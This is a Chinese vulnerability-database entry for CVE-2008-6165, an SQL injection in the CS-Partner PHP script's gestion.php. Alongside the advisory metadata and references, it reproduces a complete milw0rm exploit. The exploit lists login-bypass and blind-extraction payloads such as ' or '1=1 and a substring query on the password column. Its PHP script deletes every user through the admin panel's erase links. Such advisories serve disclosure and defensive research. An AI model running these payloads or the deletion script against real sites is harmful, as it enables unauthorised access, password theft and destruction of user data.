Easy-Script CS-Partner "gestion.php" 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116481 漏洞类型 SQL注入
发布时间 2008-10-23 更新时间 2009-02-24
CVE编号 CVE-2008-6165 CNNVD-ID CNNVD-200902-392
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/6814
https://www.securityfocus.com/bid/31886
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-392
|漏洞详情
CSPartner0.1版本的gestion.php中存在SQL注入漏洞,当magic_quotes_gpc被中止时,远程攻击者可以借助(1)pseudo和(2)页参数,执行任意SQL指令。
|漏洞EXP
<?php

/*

   CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit
   ----------------------------------------------------------------
   By StAkeR[at]hotmail[dot]it 
   http://www.easy-script.com/scripts-dl/cspartne-01.zip
   ----------------------------------------------------------------
   
   File gestion.php
   
   5. if(!empty($_POST["pseudo"]) && !empty($_POST["passe"])){
   6. $sql  = "SELECT * FROM $tblPartner where pseudo='".$_POST["pseudo"]."' AND password='".$_POST["passe"]."'";
   7. $resultat = mysql_db_query($mydbPartner, $sql);
   
   Blind SQL Injection or Login ByPass for you :P
   
   Examples: ($_POST['pseudo'] and $_POST['passe'])
   
  -1 ' or '1=1
  -2 ' or ascii(substring((select password from CSPartner where id=1),1,1))=[97]/*
  -3 and other :D
  
   
   
*/


error_reporting(0);

$host = $argv[1] or die("Usage: php [exploit.php] [http://localhost/cms]\n");

if(preg_match_all('/erase=(.+?)"/',file_get_contents($host.'/admin/index.php'),$out))
{
  for($i=0;$i<=count($out);$i++)
  {
    file_get_contents($host.'/admin/index.php?erase='.$out[1][$i]);
  }
    echo "[-] All Users Deleted\n";
}
else
{
  echo "[-] Exploit Failed!\n";
}

# milw0rm.com [2008-10-23]
|受影响的产品
comscripts.com CS-Partner 1.0
|参考资料

来源:XF
名称:cspartner-gestion-sql-injection(46067)
链接:http://xforce.iss.net/xforce/xfdb/46067
来源:BID
名称:31886
链接:http://www.securityfocus.com/bid/31886
来源:MILW0RM
名称:6814
链接:http://www.milw0rm.com/exploits/6814
来源:SECUNIA
名称:32376
链接:http://secunia.com/advisories/32376